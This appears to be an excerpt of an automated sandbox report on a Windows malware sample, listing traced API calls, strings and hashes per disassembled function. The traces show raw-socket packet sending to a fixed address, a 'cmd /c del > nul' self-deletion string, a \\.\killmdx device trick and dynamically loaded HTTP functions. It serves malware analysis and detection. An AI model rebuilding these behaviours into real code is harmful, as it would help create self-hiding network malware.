                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 10003DA5
                                                                    • memcpy.MSVCRT(?,?,00000400,?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 10003DB9
                                                                    • WSASocketA.WS2_32(00000002,00000003,00000011,00000000,00000000,00000000), ref: 10003DCA
                                                                    • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 10003DE3
                                                                    • htons.WS2_32(00000000), ref: 10003DFB
                                                                    • inet_addr.WS2_32(10014E04), ref: 10003E06
                                                                    • sendto.WS2_32(00000000,?,0000041C,00000000,00000002,00000010), ref: 10003E26
                                                                    • Sleep.KERNEL32(0000000F), ref: 10003E31
                                                                    • closesocket.WS2_32(00000000), ref: 10003E41
                                                                    • WSACleanup.WS2_32 ref: 10003E47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$htons$inet_addrmemset$CleanupSleepSocketStartupclosesocketgethostbynamegethostnamesendtosetsockopt
                                                                    • String ID: E
                                                                    • API String ID: 1971654275-3568589458
                                                                    • Opcode ID: bd3a2232d961139197c903782ac06f848b2c32c88a1df5cf84e162ccea684661
                                                                    • Instruction ID: dcb934989ef18a7ddb02ee46218ce7e8227b8117b0d583df152e2729491c7093
                                                                    • Instruction Fuzzy Hash: 2B614AB291026CAAEB10DBE0CC89EDFB7BCEF09744F404196F605E7191E7749A84CB65
                                                                    APIs
                                                                    • OutputDebugStringA.KERNEL32(10013F80), ref: 10009E95
                                                                    • GetInputState.USER32 ref: 10009E97
                                                                    • GetCurrentThreadId.KERNEL32 ref: 10009EA2
                                                                    • PostThreadMessageA.USER32(00000000), ref: 10009EA9
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10009EB6
                                                                    • OutputDebugStringA.KERNEL32(10013F6C), ref: 10009EE0
                                                                    • sprintf.MSVCRT ref: 10009F10
                                                                    • lstrlenA.KERNEL32(?), ref: 10009F69
                                                                    • Sleep.KERNEL32(00000032), ref: 10009F8F
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009FA9
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10009FB0
                                                                    • Sleep.KERNEL32(000F4240), ref: 10009FBB
                                                                      • Part of subcall function 1000A053: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                      • Part of subcall function 1000A053: _beginthreadex.MSVCRT ref: 1000A08A
                                                                      • Part of subcall function 1000A053: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                      • Part of subcall function 1000A053: CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseDebugHandleMessageObjectOutputSingleSleepStringThreadWait$CreateCurrentEventInputPostState_beginthreadexlstrlensprintf
                                                                    • String ID: %$C$Default$G$Rsjshd fzfgkqcm$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 60511694-2336843467
                                                                    • Opcode ID: 5fd02b5b165e6772ed4fe900560be53770c941551eae1393e65120d02a46746f
                                                                    • Instruction ID: 9960f11ff677865e00d4a80e1f9e44503e730f9edb69a08a911f06a63ed9e866
                                                                    • Instruction Fuzzy Hash: 2E3193A1C0429DBAFB01D7B88C88FEF7E6CDF15288F0440A4F640A6196D6795F488776
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 10002A4C
                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10002C1E
                                                                    • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 10002C2B
                                                                    • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 10002C38
                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 10002C45
                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10002C55
                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 10002C62
                                                                    • strlen.MSVCRT ref: 10002D1D
                                                                    • strlen.MSVCRT ref: 10002D2A
                                                                    • memset.MSVCRT ref: 10002D55
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10002D9D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Librarystrlen$FreeLoadmemset
                                                                    • String ID: H$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$a$c$e$k$o$o$r$wininet.dll
                                                                    • API String ID: 347128292-2978308426
                                                                    • Opcode ID: 986d9fcbbcf53a1930344b6e120e1ba53f474346e0fddfdd983dae15db621f11
                                                                    • Instruction ID: 55c1d738590813a071a3fe62bfda0b50337645362d61d571059f78ab30ed4b43
                                                                    • Instruction Fuzzy Hash: 52D1A160C083DCDDEF12C7A8C8487DEBFB55F16748F0841D9D5886A292C7BA0A59CB76
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 100021DB
                                                                    • htons.WS2_32(00000000), ref: 10002205
                                                                    • htons.WS2_32(00000028), ref: 10002223
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 1000224F
                                                                    • htons.WS2_32(00000001), ref: 10002270
                                                                    • htons.WS2_32(00000000), ref: 1000227D
                                                                    • htonl.WS2_32(00000001), ref: 10002290
                                                                    • htons.WS2_32(00000200), ref: 100022A9
                                                                    • htons.WS2_32(00000014), ref: 100022CC
                                                                    • wsprintfA.USER32 ref: 10002318
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$Sockethtonlinet_addrwsprintf
                                                                    • String ID: %d.%d.%d.%d$192.168.1.224$@$E$P
                                                                    • API String ID: 1107439114-1512540977
                                                                    • Opcode ID: 77073010b6d1fce684ebbab2ad13a75a87c72ec9c7d97d7c56b76adb04bea018
                                                                    • Instruction ID: 3aa4166313006357cc0d406c2f4b3f63d1f4c060f9359cf30c27f67dc127a10d
                                                                    • Instruction Fuzzy Hash: 82815A75C4039CA9EB11DBE4CC49BEEBBBCEF09344F00415AE640BB192DAB45649CB66
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A6D1
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 0040A745
                                                                    • htonl.WS2_32(00000001), ref: 0040A786
                                                                    • memcpy.MSVCRT(?,?,0000000C), ref: 0040A7D7
                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,0000000C), ref: 0040A7E8
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 0040A80B
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 0040A81C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$Sockethtonlinet_addr
                                                                    • String ID: 192.168.1.224$@$E$P
                                                                    • API String ID: 3306927820-3350482742
                                                                    • Opcode ID: 5a0780becaf567cee12c16d5836d85fb3525f55cfcd2d93ef8ccf8fceffb88ba
                                                                    • Instruction ID: a9314fac676fd53dbf38f24c98caf17a979e5abf2df32fc7475d0e3468128e7a
                                                                    • Instruction Fuzzy Hash: 12A11A71C1035CA9EB11EBE4CC85FEEBBBCAF09704F0411AAE204F7192D7B856558B66
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind_mbscmp$AttributesCloseDirectoryH_prologNextRemove_mbsicmp
                                                                    • String ID: A$F$F$F$KERNEL32.dll$d$e$i$i$i$l$n$r$s$t
                                                                    • API String ID: 357421281-2875861116
                                                                    • Opcode ID: c4b66df1202b12aac21a2b7e94fe434a2c6a7896f4ee17bbc87a2d124414de7b
                                                                    • Instruction ID: 06f2c94d14f0396f3e565ae6d6d6be8eb89252f200037f8b5ce93c3806638ce6
                                                                    • Instruction Fuzzy Hash: B151807180429DEEEF01EBE5CC48BEEBF74EF15314F04405AE114B21A1DBB98A84CB65
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 0040BC80
                                                                    • gethostname.WS2_32(?,00000104), ref: 0040BC97
                                                                    • gethostbyname.WS2_32(?), ref: 0040BCA4
                                                                    • memset.MSVCRT ref: 0040BCC7
                                                                    • inet_addr.WS2_32(10014E04), ref: 0040BD00
                                                                    • memset.MSVCRT ref: 0040BD43
                                                                    • memcpy.MSVCRT(?,?,00000004,?,00000000,0000043C), ref: 0040BD59
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 0040BD6B
                                                                    • memcpy.MSVCRT(?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 0040BD7D
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 0040BD8F
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?), ref: 0040BDA1
                                                                    • memcpy.MSVCRT(?,?,00000400), ref: 0040BDB8
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000414,?,?,00000400), ref: 0040BDDF
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 0040BDF1
                                                                    • memcpy.MSVCRT(?,?,00000400,?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 0040BE05
                                                                    • WSASocketA.WS2_32(00000002,00000003,00000011,00000000,00000000,00000000), ref: 0040BE16
                                                                    • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 0040BE2F
                                                                    • inet_addr.WS2_32(10014E04), ref: 0040BE52
                                                                    • sendto.WS2_32(00000000,?,0000041C,00000000,00000002,00000010), ref: 0040BE72
                                                                    • Sleep.KERNEL32(0000000F), ref: 0040BE7D
                                                                    • closesocket.WS2_32(00000000), ref: 0040BE8D
                                                                    • WSACleanup.WS2_32 ref: 0040BE93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$inet_addrmemset$CleanupSleepSocketStartupclosesocketgethostbynamegethostnamesendtosetsockopt
                                                                    • String ID: E
                                                                    • API String ID: 2767424432-3568589458
                                                                    • Opcode ID: 4b2431a2f927a7bb9c07503708122269beeda63dc347ae072476cbd1710014a4
                                                                    • Instruction ID: 2047285b8ba9929f1abb5f271b13bb79f499a251bf6189dbcae7618c3159e964
                                                                    • Opcode Fuzzy Hash: 4b2431a2f927a7bb9c07503708122269beeda63dc347ae072476cbd1710014a4
                                                                    • Instruction Fuzzy Hash: 3F61DBB195031CAAEB10DBE0CD89EDE77BCEF04744F0041A6F705E7191E7749A588B69
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005D57
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 10005D74
                                                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 10005D8F
                                                                    • lstrcpyA.KERNEL32(?, /c del ), ref: 10005DA9
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005DC3
                                                                    • lstrcatA.KERNEL32(?, > nul), ref: 10005DD1
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005DE1
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 10005E0D
                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 10005E1A
                                                                    • GetCurrentThread.KERNEL32 ref: 10005E1E
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 10005E2B
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,?), ref: 10005E44
                                                                    • SetPriorityClass.KERNEL32(?,00000040), ref: 10005E53
                                                                    • SetThreadPriority.KERNEL32(?,000000F1), ref: 10005E5A
                                                                    • ResumeThread.KERNEL32(?), ref: 10005E5F
                                                                    • GetCurrentProcess.KERNEL32(00000020), ref: 10005E6C
                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 10005E73
                                                                    • GetCurrentThread.KERNEL32 ref: 10005E76
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 10005E7D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PriorityThread$Current$ClassProcesslstrcat$Name$CreateEnvironmentFileModulePathResumeShortVariablelstrcpy
                                                                    • String ID: /c del $ > nul$COMSPEC$D
                                                                    • API String ID: 3725893594-850586679
                                                                    • Opcode ID: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction ID: ba411fa6bdf7f64fa30379c83865f067525f0869c798039ec0ba23a7a8a6f602
                                                                    • Opcode Fuzzy Hash: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction Fuzzy Hash: 4E31DAB290022CBFFB109BE0DC88EDB7BBCEB48391F104566F615E6194DB759A44CB61
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 00411EE3
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00411EEE
                                                                    • PostThreadMessageA.USER32(00000000), ref: 00411EF5
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00411F02
                                                                    • sprintf.MSVCRT ref: 00411F5C
                                                                    • lstrlen.KERNEL32(?), ref: 00411FB5
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411FF5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411FFC
                                                                      • Part of subcall function 0041209F: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004120B8
                                                                      • Part of subcall function 0041209F: _beginthreadex.MSVCRT ref: 004120D6
                                                                      • Part of subcall function 0041209F: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004120E6
                                                                      • Part of subcall function 0041209F: CloseHandle.KERNEL32(?), ref: 004120EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleMessageObjectSingleThreadWait$CreateCurrentEventInputPostState_beginthreadexlstrlensprintf
                                                                    • String ID: %$C$G$Rsjshd fzfgkqcm$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 484184172-600094759
                                                                    • Opcode ID: 3ec30ea2cb6911e7687c0279ffeec8f5cb355a9439741ae30a149b9de0f7ca44
                                                                    • Instruction ID: f8c3a3a60109db68f9018fe92c162ea195ae6b72702514cab76667c72bc4cefc
                                                                    • Opcode Fuzzy Hash: 3ec30ea2cb6911e7687c0279ffeec8f5cb355a9439741ae30a149b9de0f7ca44
                                                                    • Instruction Fuzzy Hash: 083186A1C0429CBAFB0197B48C88FEF7E7C9F15288F0441A9F644A6196D7B94F488775
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 100093C5
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 100093D1
                                                                    • wsprintfA.USER32 ref: 100093EC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 100093EF
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10009407
                                                                    • strrchr.MSVCRT ref: 10009416
                                                                    • wsprintfA.USER32 ref: 1000942D
                                                                    • DefineDosDeviceA.KERNEL32(00000001,?,?), ref: 1000945A
                                                                    • Sleep.KERNEL32(00000064), ref: 10009462
                                                                    • MoveFileExA.KERNEL32(?,\\.\killmdx,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 100094B0
                                                                    • SetFileAttributesA.KERNEL32(?,00000002), ref: 100094BF
                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 100094C9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 100094D2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 100094DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$??2@??3@wsprintf$AttributesCreateDefineDeviceDirectoryFolderModuleMoveNamePathSleepSpecialstrrchr
                                                                    • String ID: \??\%s\%s$\\.\killmdx$d$i$k$l$l$m$x
                                                                    • API String ID: 2666178103-1535202459
                                                                    • Opcode ID: 49c5fb7fe1971c498a31ef3fc30b7af30c94aaf776dfd266b027c62efaa53d5b
                                                                    • Instruction ID: ec8a5a3b3f4b5005c648f4da811f148fbaa80bf784415522cf58aeb125771150
                                                                    • Opcode Fuzzy Hash: 49c5fb7fe1971c498a31ef3fc30b7af30c94aaf776dfd266b027c62efaa53d5b
                                                                    • Instruction Fuzzy Hash: 46419A31C0439CFEFB01D7E4CC89FDEBFB9AB06344F044099E245A6192C7BA5A598B61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscpymemsetstrlen$Sleepclosesocket$ExitThreadUserconnecthtonssendsocketsprintfstrncpywsprintf
                                                                    • String ID: http://
                                                                    • API String ID: 2248495583-1121587658
                                                                    • Opcode ID: 1fa7bb76086c9d62cbf7959ab111ec4a04d5eb30678cdbd2d996a5bc2ea49437
                                                                    • Instruction ID: d465bee2d41e8efb3392e8709a26bebf5d1ad12d85fbbbe2977b2571eff9cc19
                                                                    • Opcode Fuzzy Hash: 1fa7bb76086c9d62cbf7959ab111ec4a04d5eb30678cdbd2d996a5bc2ea49437
                                                                    • Instruction Fuzzy Hash: 7581A57291026CAAEB11DBA4CC89FDE7BB8FF09310F1440A6E604F6190D7789B54CBA5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$sprintfstrlen$CountExitStartupThreadTickclosesocketconnecthtonsinet_addrmallocrandrecvsendsocket
                                                                    • String ID: #0%s!$%s/%s
                                                                    • API String ID: 1225622339-1627496495
                                                                    • Opcode ID: c9efba1d756048f844a196d80d953edabda74aa17811aa5757aed1c508d76105
                                                                    • Instruction ID: cd607ab1cd02ee6cc35d433b2eab6e523d31a1c03ef89bd83127d2f7d4ddc0bc
                                                                    • Opcode Fuzzy Hash: c9efba1d756048f844a196d80d953edabda74aa17811aa5757aed1c508d76105
                                                                    • Instruction Fuzzy Hash: 3A513EB180025CAFFB00DBA0DD85EEEBBBCEF05384F014165F505A7295DB349E448B65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Librarystrlen$FreeLoadmemset
                                                                    • String ID: H$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$a$c$e$k$o$o$r
                                                                    • API String ID: 617352072-830452295
                                                                    • Opcode ID: b402d0974125de774299138ddefa45d9552fcc76887086e3f38202d1b3a9aec7
                                                                    • Instruction ID: ba6a2463532bda89d1bc4c72a8bc768b2cd287c781cd4b76582bc51c350ccd77
                                                                    • Opcode Fuzzy Hash: b402d0974125de774299138ddefa45d9552fcc76887086e3f38202d1b3a9aec7
                                                                    • Instruction Fuzzy Hash: D5D1A160C083DCDDEF12C7A8C8487DEBFB55F16748F084099D5886A292C7BA0659CB76
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$strncpy$strlen$ExitSleepThreadUseratoistrstr
                                                                    • String ID: ^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                                                    • API String ID: 3594089800-2088177147
                                                                    • Opcode ID: aa3b83fa77a598f9d99798c640f550db1c5f0176ecd428ee98287a4306a3aaf2
                                                                    • Instruction ID: 3a3d364c3fafddd854bf2716e587e0a32d8112279dbd52e463233622ee5f68c7
                                                                    • Opcode Fuzzy Hash: aa3b83fa77a598f9d99798c640f550db1c5f0176ecd428ee98287a4306a3aaf2
                                                                    • Instruction Fuzzy Hash: 61717E61D0438DAAEB11D7E4CC89FDFBFAC9F16348F044096E248B6182D7B99648C776
                                                                    APIs
                                                                    • memset.MSVCRT ref: 100083CF
                                                                    • strrchr.MSVCRT ref: 100083D9
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000), ref: 100083FA
                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 10008419
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 10008424
                                                                    • memset.MSVCRT ref: 10008434
                                                                    • wsprintfA.USER32 ref: 1000844C
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 1000846C
                                                                    • memset.MSVCRT ref: 10008487
                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 100084A3
